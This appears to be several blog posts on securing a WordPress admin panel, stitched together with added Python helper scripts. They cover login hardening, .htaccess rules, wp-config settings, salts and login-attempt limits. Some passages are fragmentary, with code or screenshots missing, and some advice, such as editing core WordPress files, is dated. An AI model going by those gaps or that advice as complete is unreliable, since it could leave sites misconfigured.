The WordPress admin panel is under attack: what to do. Reliable WordPress protection against hacking, including a secure connection.


1. Use a good login.

Protecting a WordPress site starts with the elementary - creating a good login. When installing WordPress, users often use the login that the installer offers by default, namely − admin. This is what bots looking for holes in the security of your site check in the first place. Using this login, you already provide half of the necessary information for hackers, and they just have to guess the password.

If you have already installed the platform and are working on your site, you are unlikely to want to remove the installation and start from scratch just to use a more secure login. There is a way out:

Step 1 - Creating a New User

Log in to the WordPress admin panel and create a new account with a more complex login, endowed with full access to all site functions, i.e. administrator rights.

From the main menu on the left, select Users >> Add New.

Enter all required information for the new user, defining their role as "Administrator" and press "Add new user".

Step 2 - Deleting the admin user

After that, log out of the control system, log in with a new account and delete the user admin from the system in one of the following ways:

Method 1 – From the main menu on the left select Users >> All users. Hover over username admin and you will see the function "Delete".

Method 2 – From the main menu on the left, select Users >> All users. Find a user admin, tick it and from the drop down menu "Actions" select "Delete". After that click on the option "Apply" below the list of users. This option is useful if you need to remove multiple users at once.

You can also change the username admin through a database query:
UPDATE wp_users SET user_login = 'new_login' WHERE user_login = 'admin';

This method has a drawback: wp_posts stores the author of each post in post_author as the user's numeric ID (wp_users.ID), not as the login, so the query above on its own cannot be used to re-attribute posts, and comparing post_author to a login string is wrong. If posts written under the old admin account need to be moved to a different account, look up both IDs in wp_users and run another query (the IDs below are placeholders):
UPDATE wp_posts SET post_author = NEW_USER_ID WHERE post_author = OLD_ADMIN_ID;

2. Use a complex and unique password.

Protecting the WordPress admin area is, of course, impossible without a strong password. It is important that it be unique and include numbers, upper- and lower-case letters, punctuation marks, symbols, and so on. Passwords like pass, 1q2w3e4r5t6y, 87654321, qwerty, abc123, 111111, 1234, your date of birth, etc. are not reliable, but many users continue to use them. Example of a good password: pcVaOF8r39. Of course, such a password is difficult to remember, but there are a number of programs that generate and store passwords and can be integrated into your browser (for example, Password Agent, KeePass, Roboform, etc.).

If you still would like to remember your passwords by heart, we recommend that you create a combined password from a name/word you know well, with a few large letters/numbers in random places, and a few special characters at the beginning or end. Such a password will also be difficult to guess, but it will be easy enough to remember.

Remember to update your passwords regularly.

3. Update your WordPress version.

WordPress cares about its users, which is why you will see a notification in the admin panel when a new version is released. We recommend updating as soon as you see it, because running an outdated version of the platform is one of the most common security weaknesses of a site.

4. Hide WordPress version.

By default, WordPress adds its current version number to the source of your files and pages. Since it is not always possible to update WordPress on time, this can become a weak point of your website: knowing which version you run, a hacker knows which known vulnerabilities to try.

With the help of a file functions.php you can disable the display of information about the version of your platform. To do this, you need to open the file functions.php, located in the root folder of your website's current theme (wp-content/themes/current_wordpress_theme), and add the following code:
remove_action('wp_head', 'wp_generator');

Or you can add the following code to the file functions.php:

/* Hide WP version strings from scripts and styles
 * @return (string) $src
 * @filter script_loader_src
 * @filter style_loader_src
 */
function fjarrett_remove_wp_version_strings($src) {
    global $wp_version;
    // parse_url() returns null when the URL has no query string; cast so parse_str() gets a string
    parse_str((string) parse_url($src, PHP_URL_QUERY), $query);
    // Only strip ver= when it is the core version; plugin/theme asset versions are left alone
    if (!empty($query['ver']) && $query['ver'] === $wp_version) {
        $src = remove_query_arg('ver', $src);
    }
    return $src;
}
add_filter('script_loader_src', 'fjarrett_remove_wp_version_strings');
add_filter('style_loader_src', 'fjarrett_remove_wp_version_strings');

/* Hide WP version strings from generator meta tag */
function wpmudev_remove_version() {
    return '';
}
add_filter('the_generator', 'wpmudev_remove_version');

Apart from the above, the header.php file of a WordPress theme may also print the version of your installation, which, as mentioned earlier, is very interesting to a hacker. By removing the following line from the file, you get rid of this extra information:

” />
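As an added example (not code from the article or from WordPress), the following Python checker parses a saved copy of a page's HTML and reports the two leaks the snippets above remove: the generator <meta> tag and ?ver= query strings on scripts and styles. The HTML samples are constructed, the version "6.0" in them is a made-up value, and the paths are the standard wp-includes/wp-content locations; run it against your own front page before and after the change to confirm the filters took effect.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit


class VersionLeakFinder(HTMLParser):
    """Collect the two places WordPress prints its version into a page:
    the generator <meta> tag and the ?ver= query string on scripts/styles."""

    def __init__(self, wp_version=None):
        super().__init__()
        self.wp_version = wp_version  # if known, only ver= values equal to it are reported
        self.leaks = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("name") or "").lower() == "generator":
            self.leaks.append(("meta-generator", a.get("content") or ""))
            return
        url = a.get("src") if tag == "script" else a.get("href") if tag == "link" else None
        if not url:
            return
        ver = parse_qs(urlsplit(url).query).get("ver")
        if ver and (self.wp_version is None or ver[0] == self.wp_version):
            self.leaks.append((f"{tag}-ver", ver[0]))


def find_version_leaks(html, wp_version=None):
    """Return a list of (where, value) pairs; an empty list means nothing leaked."""
    finder = VersionLeakFinder(wp_version)
    finder.feed(html)
    finder.close()
    return finder.leaks


# Constructed page head as WordPress renders it by default ("6.0" is a made-up sample version).
HEAD_BEFORE = """<head>
<meta name="generator" content="WordPress 6.0" />
<link rel="stylesheet" href="/wp-includes/css/dist/block-library/style.min.css?ver=6.0" />
<script src="/wp-includes/js/jquery/jquery.min.js?ver=3.6.0"></script>
<script src="/wp-content/plugins/example-plugin/app.js?ver=6.0"></script>
</head>"""

# The same head after the functions.php filters have run: no generator tag,
# and ver= removed wherever it equalled the core version (the jQuery version stays).
HEAD_AFTER = """<head>
<link rel="stylesheet" href="/wp-includes/css/dist/block-library/style.min.css" />
<script src="/wp-includes/js/jquery/jquery.min.js?ver=3.6.0"></script>
<script src="/wp-content/plugins/example-plugin/app.js"></script>
</head>"""


if __name__ == "__main__":
    for where, value in find_version_leaks(HEAD_BEFORE, wp_version="6.0"):
        print(f"leak: {where} -> {value}")
```

Pass wp_version when you know it, so that legitimate library versions (jQuery above) are not reported; without it every ver= value is listed for you to judge.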

5. Download themes and plugins from trusted sources.

WordPress is so widespread that more and more developers are creating ready-made themes and plugins for it. While most of them will make your site easier to use and enhance its functionality, some can hide very unpleasant consequences in the form of viruses and open doors for hackers. Use only trusted download resources for themes and plugins, such as wordpress.org, and pay attention to any warnings about malicious files that appear. As with WordPress itself, it's important to keep plugins up to date with the latest versions.

6. Do not store unnecessary files.

Inactive extensions can pose a serious threat to the security of your site, so feel free to remove all unused plugins and themes. For example, you may have installed several themes to test them and choose the one you will use; after choosing, do not forget to delete all the unnecessary ones.

7. Regularly check your local computer for viruses.

Taking the various steps to secure your WordPress site is fine, but you also need to keep an eye on your computer. You must have a constantly updated antivirus installed. Otherwise, you risk infecting your website by uploading virus files.

8. Make site backups.

Not all malicious attacks can be prevented, but just one successful attack can destroy all the effort put into your site. We recommend making regular website backups. Many hosting companies offer server-side backups, in which case you can restore the site from a copy kept on the server.

By installing the WordPress Database Backup plugin, you can additionally secure your website database. The plugin settings allow you to set the option to send a daily database backup to your contact mailbox.

9. Use a secure connection.

If you prefer to upload your files using an FTP client, use a secure SFTP server connection protocol.

10. Create an .htaccess file.

Hotlink protection code:

RewriteEngine On
# Requests with no Referer (direct visits, some privacy tools) are allowed through
RewriteCond %{HTTP_REFERER} !^$
# Own domain allowed over http and https; replace yourdomain.com with your host
RewriteCond %{HTTP_REFERER} !^https?://(.+\.)?yourdomain\.com/ [NC]
# Never rewrite the placeholder image itself, otherwise the rule loops
RewriteCond %{REQUEST_URI} !/images/nohotlink\.jpg$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

Hotlinking is embedding an image from your server on someone else's website or blog: every view of that page is served by, and paid for by, your server.

With the code above, you can force the server to check where exactly the request came from: if from the pages of your website, then the server gives the image to the user without problems; if from someone else's website, it shows an image with an error.

11. Change the prefix of the database tables.

WordPress protection against hackers will also increase if you replace the default wp_ table prefix: this complicates the work of intruders whose tools assume the standard table names. Let's consider several ways:

Method 1 - Suitable for new installations via Softaculous
If your hosting provider allows you to use the Softaculous script to install WordPress, then you can change the prefix during the initial installation: in the Advanced Options section, you will need to make the required changes.

Method 2 – For Live Sites and Fresh WordPress Installations
If your WordPress has been installed for a long time and the site is working, then you can change the prefix using the phpMyAdmin program.

Select the required database from the list and make the following database query:

RENAME table `wp_commentmeta` TO `newprefix_commentmeta`;
RENAME table `wp_comments` TO `newprefix_comments`;
RENAME table `wp_links` TO `newprefix_links`;
RENAME table `wp_options` TO `newprefix_options`;
RENAME table `wp_postmeta` TO `newprefix_postmeta`;
RENAME table `wp_posts` TO `newprefix_posts`;
RENAME table `wp_terms` TO `newprefix_terms`;
RENAME table `wp_term_relationships` TO `newprefix_term_relationships`;
RENAME table `wp_term_taxonomy` TO `newprefix_term_taxonomy`;
RENAME table `wp_usermeta` TO `newprefix_usermeta`;
RENAME table `wp_users` TO `newprefix_users`;

where "newprefix_" needs to be replaced with the new prefix you want to use instead of the prefix "wp_".

After that, you will see the new prefix in the database tables:

To make sure that all changes were successful and the wp_ prefix is no longer used inside the _options and _usermeta tables, you will need to make another query to the database:

SELECT * FROM `newprefix_options` WHERE `option_name` LIKE '%wp_%'

SELECT * FROM `newprefix_usermeta` WHERE `meta_key` LIKE '%wp_%'

As a result, you can find a number of prefixes that you will need to manually rename using the button Change:

The number of changes you need to make may vary. But all prefixes wp_ you must change to your new prefix for the website to function properly.

After that, don't forget to also make the prefix changes in wp-config.php file:

You can also use special plugins to change the database prefix: Change DB prefix or Change table prefix.

12. Limit the number of access attempts.

Most often, attackers make a huge number of attempts to enter your site, picking up a password. You can configure the system so that the IP address is blocked for several hours after a certain number of failed login attempts.

To do this, you can use additional plugins, such as Login LockDown or Limit Login Attempts. In the settings of these plugins, you can independently set the number of login attempts and blocking time.

Additionally, it is possible to remove the display of a message stating that the entered login and password are incorrect. After all, this is also information that can help an attacker.

To remove the output of this message, you need to open the file functions.php, located in your website's current theme folder (wp-content/themes/current_wordpress_theme) and add this code:
// create_function() was removed in PHP 8.0; an anonymous function does the same job
add_filter('login_errors', function ($errors) { return ''; });

13. Remove readme.html and license.txt.

The readme.html and license.txt files are present in the root folder of any WordPress installation. You do not need them, and they help hackers, for example by revealing the current version of your WordPress and other details useful for attacking a website. We recommend removing them immediately after installing WordPress.

14. Use an SSL certificate.

To protect transmitted data and keep the exchange confidential, we recommend using the SSL protocol. This is especially important for online stores, unless you want your customers' personal data to travel in the clear.

First of all, you will need to install it for your domain name.

After that, you can set the mandatory use of the SSL protocol when logging into your site's control panel. To do this, open wp-config.php file located in the root folder of your website and add the following line:
define('FORCE_SSL_ADMIN', true);

15. Modify the wp-config.php file.

By adding this code to wp-config.php file, you can also strengthen the protection of your website:

Restriction on theme and plugin changes:
define('DISALLOW_FILE_EDIT', true);

Disabling the ability to install and remove plugins:
define('DISALLOW_FILE_MODS', true);

Adding salt keys or so-called security keys: you will first need to find such strings in wp-config.php file:

Either you will see that the keys are already set and you can change them, or you will see lines like 'put your unique phrase here', which means the keys have not yet been set:
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
define('AUTH_SALT', 'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT', 'put your unique phrase here');
define('NONCE_SALT', 'put your unique phrase here');
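As an added example covering both the table-prefix check (section 11) and the wp-config.php hardening above (section 15), the Python script below reads a wp-config.php, flags placeholder or short salts, a missing DISALLOW_FILE_EDIT / FORCE_SSL_ADMIN and the default wp_ prefix, and generates fresh 64-character salts from the operating system's CSPRNG to drop into the file. It is not the project's code: the define() parser is a minimal one written for this example, the sample config is constructed, and the generated salts play the same role as those from the api.wordpress.org service linked in the comment above.

```python
import re
import secrets
import string

SALT_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
PLACEHOLDER = "put your unique phrase here"
# Constants the article recommends, with the value they should have.
HARDENING = {"DISALLOW_FILE_EDIT": "true", "FORCE_SSL_ADMIN": "true"}
# No quotes or backslashes, so a value can be dropped straight into a single-quoted PHP string.
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*()-_=+[]{};:,.<>?/~"

DEFINE_RE = re.compile(r"define\(\s*'([A-Z_]+)'\s*,\s*(?:'([^']*)'|(true|false))\s*\)")
PREFIX_RE = re.compile(r"\$table_prefix\s*=\s*'([^']*)'")


def parse_config(text):
    """Minimal reader for wp-config.php: define('NAME', 'str'|true|false) and $table_prefix.
    (Helper written for this example; WordPress itself simply executes the file.)"""
    defs = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in DEFINE_RE.finditer(text)}
    m = PREFIX_RE.search(text)
    return defs, (m.group(1) if m else None)


def audit(text):
    """Return human-readable findings; an empty list means every check passed."""
    defs, prefix = parse_config(text)
    findings = []
    for key in SALT_KEYS:
        value = defs.get(key)
        if value is None or value == PLACEHOLDER:
            findings.append(f"{key}: placeholder or missing")
        elif len(value) < 32:
            findings.append(f"{key}: only {len(value)} characters")
    for key, wanted in HARDENING.items():
        if defs.get(key) != wanted:
            findings.append(f"{key}: should be {wanted}")
    if prefix == "wp_":
        findings.append("table_prefix: still the default wp_")
    return findings


def generate_salts(length=64):
    """Fresh random keys and salts from the OS CSPRNG, one per constant."""
    return {key: "".join(secrets.choice(ALPHABET) for _ in range(length)) for key in SALT_KEYS}


def replace_salts(text, salts):
    """Rewrite each define('AUTH_KEY', '...'); line in place; all other lines are untouched."""
    for key, value in salts.items():
        pattern = re.compile(rf"define\(\s*'{key}'\s*,\s*'[^']*'\s*\);")
        text = pattern.sub(lambda m, k=key, v=value: f"define('{k}', '{v}');", text)
    return text


# Constructed sample of a freshly installed, unhardened wp-config.php.
SAMPLE_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');
$table_prefix = 'wp_';
define('WP_DEBUG', false);
"""


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print("finding:", finding)
    print(replace_salts(SAMPLE_CONFIG, generate_salts()))
```

Changing the salts logs every user out, which is exactly what you want after a suspected compromise; the prefix and the two hardening constants still have to be edited by hand (or, for the prefix, renamed in the database as described in section 11).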

I would like to mention some plugins separately:

This is a WordPress security plugin that allows you to scan your website for malicious code, hacker holes and loopholes, showing real-time website and traffic analytics. There is also the possibility of setting up automatic scanning and much more.

This plugin checks your website for various security vulnerabilities and offers a range of methods to fix them. For example, passwords, different file permissions, database protection, WordPress version information protection, administrator protection, and more.

This plugin allows you to secure user accounts and logins, databases and file system, prevent brute force attacks (password guessing attacks), scan the site, and more.

As sad as it may sound, protecting WordPress is a complex thing, and the methods described in this article do not guarantee 100% that your site will be completely protected from any fraudulent activities. However, they should not be neglected, as they will significantly reduce the possibility of hacking the site by intruders.

WordPress is a very popular CMS. That is undoubtedly a plus, since there are plugins for any task, but it is also its weakness: the more popular a CMS is, the more attacks it draws, because it is more interesting to a hacker. Once a vulnerability is found in WordPress, hundreds of thousands of sites are exposed to attackers, so protecting your WordPress site needs special attention.

Why are WordPress sites hacked?

All popular CMSs (website engines) get hacked, and WordPress is no exception. Hacking is done mainly with so-called exploits, programs (scripts) that gain control over the site. This is usually done to place links from your site to other resources, or to add the site to a botnet used for DDoS attacks on other servers, while the site itself keeps working and you will never notice with the naked eye that it is infected. In any case, a hack will have a bad effect on your site, and you may even disappear from the search results.

As I said, hacking happens automatically. Determining the CMS of a site is not difficult; there are many online services for this. Often the attacking program simply tries to guess the password for the administrative part of the site: it goes to your-site.ru/wp-admin and tries passwords for your user. The username is not hard to find, since you write articles under it and bots know where to look for it, unless of course you hid it with a plugin, one of which is discussed below. The site administrator's password should be very complex, but even then you cannot let bots brute-force the "admin panel" password, because this is needless load on the server; imagine several dozen bots from different parts of the world doing it at once.

Plugin to protect WordPress from attacks

Let's move on to the plugin. There are a few worth mentioning, but let's talk about a simpler and more understandable one that I use on many of my own and my customers' projects; it copes very well with the task of protecting the site -

This plugin is quite easy to learn, and 90% Russified, it is installed like any plugin from the WordPress repository, after installation you need to activate it and make the basic settings. It appears in the main menu in the WordPress admin

WP Security plugin dashboard

After going to the plugin settings, we get to the control panel. Here you can make the main important settings.

  1. It shows the last 5 logins to your admin panel with the user and IP address. For example, I immediately see my own IPs, and there are only two of them, so I can be sure that nobody else knows the password to the administrative part.
  2. The section of the most important functions: everything here needs to be enabled, and you should agree to all of it.
  3. The plugin can track file changes on the hosting and e-mail you a report, so you always know which files changed. This is very useful: if someone has uploaded a script or any file with malicious code, you will see it in the report at once. The only drawback is that after you update any other plugin or the WordPress engine itself, WP Security sees all of those changes too and sends you a huge list, but you get used to these reports, because you know when you updated the files yourself.
  4. This item changes the standard admin panel address yoursite.ru/wp-admin to yoursite.ru/luboe-slovo. This hides your admin panel from some unlucky hackers and bots, but unfortunately not from all of them; the more advanced ones still find it, which I can tell from the "Authorizations" section, but more on that later.
  5. This item should be turned off, as in the screenshot. It is only needed when you want to put the site into maintenance mode: visitors are shown a message that the site is undergoing technical work. Sometimes it is useful, for example when changing the site's design or making some global changes, but do not forget that in this mode search robots cannot view your site either, so do not keep it closed for long.

Protecting the WordPress Admin from Password Guessing

Now let's go to the menu item Authorization, in my opinion a very useful one, and it should be configured as I have it on one of my sites. With an attendance of about 1000 people, the plugin catches dozens of attempts per day to guess the admin panel password and adds the attackers' IP addresses to the black list, i.e. blocks them completely: the site stops responding to that IP address at all, which nullifies the password-guessing attempts. These are the settings I use:

  1. I leave the number of allowed "mistakes" at 3. Do not set it lower: you can mistype the password yourself and end up blacklisting your own IP.
  2. This is the time after which the counter of invalid login attempts is reset.
  3. The period for which IP addresses with failed login attempts are blocked, in minutes. I set it high, i.e. a very long ban: on the screenshot it is 6,000,000 minutes, about 11 years, which I think is enough.

All blocked IPs will be denied access not only to the admin panel, but to the entire site, keep this in mind
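As an added example illustrating both section 12 (limiting login attempts) and the three Authorization settings above, the Python script below replays the policy over web-server access-log lines: a wrong password makes WordPress re-render wp-login.php with HTTP 200 while a successful login redirects with 302, so POST + 200 is counted as a failure; the counter resets when more than reset_after_min pass between failures, and the max_attempts-th failure blocks the IP for lockout_min. It is not the plugin's code, and the log lines and IP addresses are constructed samples; point it at your real access log to see which addresses the plugin would have banned.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format, e.g.
# 203.0.113.5 - - [10/Mar/2024:12:01:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: a legitimate login (form GET, then POST answered by a 302 redirect),
# a bot firing five wrong passwords in eight seconds, and a slow bot that spaces attempts out.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:12:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 3200 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:12:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:01:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "python-requests/2.31"
203.0.113.5 - - [10/Mar/2024:12:01:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "python-requests/2.31"
203.0.113.5 - - [10/Mar/2024:12:01:04 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "python-requests/2.31"
203.0.113.5 - - [10/Mar/2024:12:01:06 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "python-requests/2.31"
203.0.113.5 - - [10/Mar/2024:12:01:08 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "python-requests/2.31"
203.0.113.9 - - [10/Mar/2024:12:05:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "curl/8.0"
203.0.113.9 - - [10/Mar/2024:12:20:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "curl/8.0"
203.0.113.9 - - [10/Mar/2024:12:40:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "curl/8.0"
"""


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"], int(m["status"])


def failed_logins(log_text):
    """IP -> sorted timestamps of failed logins (POST to wp-login.php answered with 200)."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method == "POST" and path.split("?")[0] == "/wp-login.php" and status == 200:
            failures[ip].append(ts)
    return {ip: sorted(stamps) for ip, stamps in failures.items()}


def lockouts(log_text, max_attempts=3, reset_after_min=5, lockout_min=60):
    """Apply the three plugin settings and return [(ip, locked_at, locked_until), ...]."""
    reset_after = timedelta(minutes=reset_after_min)
    lockout = timedelta(minutes=lockout_min)
    result = []
    for ip, stamps in failed_logins(log_text).items():
        count, last, locked_until = 0, None, None
        for ts in stamps:
            if locked_until is not None and ts < locked_until:
                continue  # still blocked: the server would refuse this request outright
            if last is not None and ts - last > reset_after:
                count = 0  # quiet period passed, counter starts over
            count += 1
            last = ts
            if count >= max_attempts:
                locked_until = ts + lockout
                result.append((ip, ts, locked_until))
                count, last = 0, None
    return result


if __name__ == "__main__":
    for ip, at, until in lockouts(SAMPLE_LOG):
        print(f"block {ip} from {at:%H:%M:%S} until {until:%H:%M:%S}")
```

The slow bot in the sample never gets banned with the default 5-minute reset, which is why the reset window (setting 2) matters as much as the attempt count: widen it and the spaced-out attempts are caught too.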

List of blocked IP addresses

  1. IP address of the attacker
  2. the login to which the password was selected, by the way, is correct
  3. date when the automatic lock was made

White list of addresses for the admin panel

To allow access to the administrative part of the WordPress site only from certain IP addresses, you can activate the white list of addresses in the plugin settings.

  1. activating this option
  2. here is your current IP address
  3. in this field enter all IP addresses from which access to the admin panel is allowed

If you need to specify a range of IP addresses, use an asterisk instead of a number, for example 192.168.5.*: this construction allows access to the WordPress admin panel from all IPs starting with those numbers. This is useful for those who do not have a dedicated IP address and whose address keeps changing, for example on mobile Internet; as a rule the range stays within the first two numbers, so you would write something like 192.168.*.*


A year ago, my server load very often exceeded the limit allowed by the tariff limit. At the same time, the problem was not in the sites themselves, but in a banal attack by intruders on the admin panel, in order to gain access for some of their purposes.

Today I will tell you how I coped with the problem, which I advise you to do just in case at home.

As a result, it was decided to change the address of the login form in the admin panel, as well as cover the admin panel for all outsiders who do not have my IP.

It is worth noting that some hosting companies themselves have automatically created a new admin address for all users. If you use the services of such hosting, then do not read further articles and do not waste time.

How to Change WordPress Admin Address

I posted this article before. Here it seems to be a similar result, but the effect and purpose are different.

Don't forget to back up the files you work with.

  • First, copy the wp-login.php file from the site root (where wp-config.php is located) to ftp to your computer.
  • Rename it whatever you like. For example vhod.php
  • Open this file with the free Notepad++ program (or whatever you prefer to edit) and replace all occurrences of the phrase wp-login.php with vhod.php .

You can quickly do this by pressing CTRL+F in Notepad++. Well, in the window that appears, enter:

So in a second I replaced the occurrence of the phrase I needed in the entire file. It came across 12 times.

Upload the new file to ftp.

A similar thing will need to be done in the general-template.php file, which you will find in the wp-includes folder on the same FTP server. That is, change the occurrences of wp-login.php to vhod.php, but do not change the file name itself!

Now you have a .htaccess file in the same place at the root of the site. We also copy it to our computer and open it for editing (you can use the usual Windows Notepad). We insert such a piece of code that blocks everyone from accessing the wp-login.php file

<Files wp-login.php>
Order Deny,Allow
Deny from all
</Files>

It was this step that removed the load, and also hid the authorization form. The load was removed by inserting the presented code into .htaccess: if there was a call to http://site.ru/wp-login.php, then it would return a 403 error, not a 404.

Let us briefly repeat the algorithm of work:

  • Rename the wp-login.php file to an arbitrary name and replace the occurrences of the name in it with a new one.
  • Similarly, we replace the old name wp-login.php in the general-template.php file with the new one.
  • Add a rule to the .htaccess file that denies everyone access to wp-login.php

After updating WordPress, only the general-template.php file will need to be fixed. But since the engine is updated not so often - this is a trifle compared to the effect.

We put a restriction on entering by IP through .htaccess

As an additional measure to protect the site, I adopted a restriction on entering the admin panel by IP. The problem was solved very simply: create an empty .htaccess file and add the following code to it

order deny,allow
allow from 192.168.0.1
deny from all

We save the file and upload it to the wp-admin folder in the same place at the root of the site.

Instead of my IP from the example, put your real one. Moreover, you can add several IPs from a new line each:

order deny,allow
allow from 126.142.40.16
allow from 195.234.69.6
deny from all

If the IP is dynamic, then you can put numbers only up to the first-second-third dot:
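As an added example (not from the article), the Python helper below turns the address forms used above, a single IP, a CIDR block or the 192.168.5.* wildcard style, into networks, tells you whether a given client address would pass, and renders the .htaccess allow list in the Apache 2.2 syntax the article uses (Apache 2.4 replaces order/allow/deny with Require ip). The IPs are the sample values from the article; checking your own address against the rendered list before uploading it is the cheap way to avoid locking yourself out of wp-admin.

```python
import ipaddress


def wildcard_to_network(pattern):
    """'192.168.5.*' -> 192.168.5.0/24, '192.168.*.*' -> 192.168.0.0/16.
    Plain addresses and CIDR notation are passed through unchanged."""
    if "*" not in pattern:
        return ipaddress.ip_network(pattern, strict=False)
    parts = pattern.split(".")
    fixed = [p for p in parts if p != "*"]
    # Only a trailing run of stars has a CIDR equivalent; '192.*.5.*' does not.
    if len(parts) != 4 or not fixed or parts[len(fixed):] != ["*"] * (4 - len(fixed)):
        raise ValueError(f"bad pattern: {pattern}")
    for p in fixed:
        if not p.isdigit() or int(p) > 255:
            raise ValueError(f"bad pattern: {pattern}")
    base = ".".join(fixed + ["0"] * (4 - len(fixed)))
    return ipaddress.ip_network(f"{base}/{8 * len(fixed)}")


def is_allowed(client_ip, patterns):
    """True if client_ip falls inside any allowed pattern (IPv6 clients never match IPv4 rules)."""
    ip = ipaddress.ip_address(client_ip)
    return any(ip in wildcard_to_network(p) for p in patterns)


def render_htaccess(patterns):
    """Apache 2.2-style block as used in the article; single hosts are printed as bare addresses."""
    lines = ["order deny,allow"]
    for p in patterns:
        net = wildcard_to_network(p)
        target = net.network_address if net.prefixlen == net.max_prefixlen else net
        lines.append(f"allow from {target}")
    lines.append("deny from all")
    return "\n".join(lines)


if __name__ == "__main__":
    allowed = ["126.142.40.16", "195.234.69.6", "192.168.5.*"]
    print(render_htaccess(allowed))
    for probe in ("192.168.5.77", "192.168.6.1"):
        print(probe, "allowed" if is_allowed(probe, allowed) else "denied")
```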

Do you already know how to get into the WordPress admin area?

You can do this in at least four ways by adding the following to your site address:

  1. /admin, i.e. like this: http://yoursite/admin
  2. /wp-admin
  3. /login
  4. /wp-login.php

In fact, the first three options will redirect you to the same page anyway: http://your_site/wp-login.php

It turns out that anyone can add any of the four prefixes described above to the address of your site and see the admin panel entrance:

Of course, this does not mean at all that this anyone can also easily get into the admin panel, because he still needs to know the Username or your e-mail and your password.

If your administrator user has a login: - then this is not at all prudent on your part and the attacker will only have to guess or guess your password.

In addition, did you see the inscription: Username or e-mail ? Yes, yes, it is e-mail that WordPress can use as a Username. But you could specify an E-mail address somewhere on the site that matches the E-mail of the administrator user. It turns out that the first thing an attacker can try is to enter your E-mail and here WordPress will help him again, because if the E-mail does not match, he will see this message:

and if the E-mail is correct, WordPress will write that the password for it is not correct:

As a result, a potential attacker only needs to guess or brute-force your password to hack your site (gain access to the admin panel).

How to protect the entrance to the admin panel from a potential threat? The answer is simple - try to increase the number of unknowns required for entry.

And now let's take a closer look:

  1. If possible, make sure that the E-mail of the administrator user is not mentioned anywhere on the site - the public E-mail should be something else.
  2. Your password should not be simple, when installing WordPress itself generates a complex password for you, if you do not want to use it, come up with some more or less complex password that includes small and large characters, numbers and some characters like -, ?, _ etc.
  3. Your username should also not be simple, no: admin, manager, root, administrator, user and other simple words!
  4. And finally, you need to add the third and most important unknown: change the admin login URL. For this, install a simple plugin: WPS Hide Login

WPS Hide Login

A simple, free and quite popular plugin that allows you to change the admin login URL.

After installing and activating the plugin, you need to go to the admin section: Settings / General, then scroll to the very bottom of the page and see just one parameter added by this plugin:

By default, the plugin suggests using the http://yoursite/login login - but this is by no means the best option! Come up with something of your own, for example: yyy12_go)))

After changing this parameter, do not forget to click on the button Save Changes– otherwise, when the plugin is active, you will be logged in via http://yoursite/login

Be sure to try to log out and log in again to the admin panel, but at the new login address that you yourself came up with, and most importantly, do not forget it!

After changing the entry point to the admin panel, when trying to access the standard URLs, the user will receive a 404 error page.

Attention! If you suddenly forget the new admin login address, you will need to disable this plugin. You can do this without getting into the admin panel if you have access to the folders and files of the site. You just need to rename or delete the plugin folder wps-hide-login, which will be in the folder plugins(the plugins folder is in the wp-content folder).

As a result: after applying all the above measures, we should get the protection of the admin panel login with three unknowns: E-mail / Username, a complex password and its own unique login URL - and this can greatly complicate the attempts of young hackers)

Hello, dear readers of the blog site. Today I want to talk about the security of work and some methods of protecting the site from hacking. Unfortunately, I am not an expert in this area and my knowledge does not go much beyond the scope of the article about, but I will simply describe my recent experience. I have not used anything complicated, but I hope that this will increase the security of working with my sites.

